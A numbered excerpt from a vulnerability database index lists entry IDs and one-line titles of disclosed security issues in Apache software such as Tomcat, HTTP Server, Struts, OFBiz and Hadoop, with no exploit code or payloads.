8153| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
8154| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
8155| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
8156| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
8157| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
8158| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
8159| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
8160| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
8161| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
8162| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
8163| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
8164| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
8165| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
8166| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
8167| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
8168| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
8169| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
8170| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
8171| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
8172| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
8173| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
8174| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
8175| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
8176| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
8177| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
8178| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
8179| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
8180| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
8181| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
8182| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
8183| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
8184| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
8185| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
8186| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
8187| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
8188| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
8189| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
8190| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
8191| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
8192| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
8193| [86901] Apache Tomcat Error Message Path Disclosure
8194| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
8195| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
8196| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
8197| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
8198| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
8199| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
8200| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
8201| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
8202| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
8203| [85430] Apache mod_pagespeed Module Unspecified XSS
8204| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
8205| [85249] Apache Wicket Unspecified XSS
8206| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
8207| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
8208| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
8209| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
8210| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
8211| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
8212| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
8213| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
8214| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
8215| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
8216| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
8217| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
8218| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
8219| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
8220| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
8221| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
8222| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
8223| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
8224| [83339] Apache Roller Blogger Roll Unspecified XSS
8225| [83270] Apache Roller Unspecified Admin Action CSRF
8226| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
8227| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
8228| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
8229| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
8230| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
8231| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
8232| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
8233| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
8234| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
8235| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
8236| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
8237| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
8238| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
8239| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
8240| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
8241| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
8242| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
8243| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
8244| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
8245| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
8246| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
8247| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
8248| [80300] Apache Wicket wicket:pageMapName Parameter XSS
8249| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
8250| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
8251| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
8252| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
8253| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
8254| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
8255| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
8256| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
8257| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
8258| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
8259| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
8260| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
8261| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
8262| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
8263| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
8264| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
8265| [78331] Apache Tomcat Request Object Recycling Information Disclosure
8266| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
8267| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
8268| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
8269| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
8270| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
8271| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
8272| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
8273| [77593] Apache Struts Conversion Error OGNL Expression Injection
8274| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
8275| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
8276| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
8277| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
8278| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
8279| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
8280| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
8281| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
8282| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
8283| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
8284| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
8285| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
8286| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
8287| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
8288| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
8289| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
8290| [74725] Apache Wicket Multi Window Support Unspecified XSS
8291| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
8292| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
8293| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
8294| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
8295| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
8296| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
8297| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
8298| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
8299| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
8300| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
8301| [73644] Apache XML Security Signature Key Parsing Overflow DoS
8302| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
8303| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
8304| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
8305| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
8306| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
8307| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
8308| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
8309| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
8310| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
8311| [73154] Apache Archiva Multiple Unspecified CSRF
8312| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
8313| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
8314| [72238] Apache Struts Action / Method Names <
8315| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
8316| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
8317| [71557] Apache Tomcat HTML Manager Multiple XSS
8318| [71075] Apache Archiva User Management Page XSS
8319| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
8320| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
8321| [70924] Apache Continuum Multiple Admin Function CSRF
8322| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
8323| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
8324| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
8325| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
8326| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
8327| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
8328| [69520] Apache Archiva Administrator Credential Manipulation CSRF
8329| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
8330| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
8331| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
8332| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
8333| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
8334| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
8335| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
8336| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
8337| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
8338| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
8339| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
8340| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
8341| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
8342| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
8343| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
8344| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
8345| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
8346| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
8347| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
8348| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
8349| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
8350| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
8351| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
8352| [65054] Apache ActiveMQ Jetty Error Handler XSS
8353| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
8354| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
8355| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
8356| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
8357| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
8358| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
8359| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
8360| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
8361| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
8362| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
8363| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
8364| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
8365| [63895] Apache HTTP Server mod_headers Unspecified Issue
8366| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
8367| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
8368| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
8369| [63140] Apache Thrift Service Malformed Data Remote DoS
8370| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
8371| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
8372| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
8373| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
8374| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
8375| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
8376| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
8377| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
8378| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
8379| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
8380| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
8381| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
8382| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
8383| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
8384| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
8385| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
8386| [60678] Apache Roller Comment Email Notification Manipulation DoS
8387| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
8388| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
8389| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
8390| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
8391| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
8392| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
8393| [60232] PHP on Apache php.exe Direct Request Remote DoS
8394| [60176] Apache Tomcat Windows Installer Admin Default Password
8395| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
8396| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
8397| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
8398| [59944] Apache Hadoop jobhistory.jsp XSS
8399| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
8400| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
8401| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
8402| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
8403| [59019] Apache mod_python Cookie Salting Weakness
8404| [59018] Apache Harmony Error Message Handling Overflow
8405| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
8406| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
8407| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
8408| [59010] Apache Solr get-file.jsp XSS
8409| [59009] Apache Solr action.jsp XSS
8410| [59008] Apache Solr analysis.jsp XSS
8411| [59007] Apache Solr schema.jsp Multiple Parameter XSS
8412| [59006] Apache Beehive select / checkbox Tag XSS
8413| [59005] Apache Beehive jpfScopeID Global Parameter XSS
8414| [59004] Apache Beehive Error Message XSS
8415| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
8416| [59002] Apache Jetspeed default-page.psml URI XSS
8417| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
8418| [59000] Apache CXF Unsigned Message Policy Bypass
8419| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
8420| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
8421| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
8422| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
8423| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
8424| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
8425| [58993] Apache Hadoop browseBlock.jsp XSS
8426| [58991] Apache Hadoop browseDirectory.jsp XSS
8427| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
8428| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
8429| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
8430| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
8431| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
8432| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
8433| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
8434| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
8435| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
8436| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
8437| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
8438| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
8439| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
8440| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
8441| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
8442| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
8443| [58974] Apache Sling /apps Script User Session Management Access Weakness
8444| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
8445| [58931] Apache Geronimo Cookie Parameters Validation Weakness
8446| [58930] Apache Xalan-C++ XPath Handling Remote DoS
8447| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
8448| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
8449| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
8450| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
8451| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
8452| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
8453| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
8454| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
8455| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
8456| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
8457| [58805] Apache Derby Unauthenticated Database / Admin Access
8458| [58804] Apache Wicket Header Contribution Unspecified Issue
8459| [58803] Apache Wicket Session Fixation
8460| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
8461| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
8462| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
8463| [58799] Apache Tapestry Logging Cleartext Password Disclosure
8464| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
8465| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
8466| [58796] Apache Jetspeed Unsalted Password Storage Weakness
8467| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
8468| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
8469| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
8470| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
8471| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
8472| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
8473| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
8474| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
8475| [58775] Apache JSPWiki preview.jsp action Parameter XSS
8476| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8477| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
8478| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
8479| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
8480| [58770] Apache JSPWiki Group.jsp group Parameter XSS
8481| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
8482| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
8483| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
8484| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
8485| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8486| [58763] Apache JSPWiki Include Tag Multiple Script XSS
8487| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
8488| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
8489| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
8490| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
8491| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
8492| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
8493| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
8494| [58755] Apache Harmony DRLVM Non-public Class Member Access
8495| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
8496| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
8497| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
8498| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
8499| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
8500| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
8501| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
8502| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
8503| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
8504| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
8505| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
8506| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
8507| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
8508| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
8509| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
8510| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
8511| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
8512| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
8513| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
8514| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
8515| [58725] Apache Tapestry Basic String ACL Bypass Weakness
8516| [58724] Apache Roller Logout Functionality Failure Session Persistence
8517| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
8518| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
8519| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
8520| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
8521| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
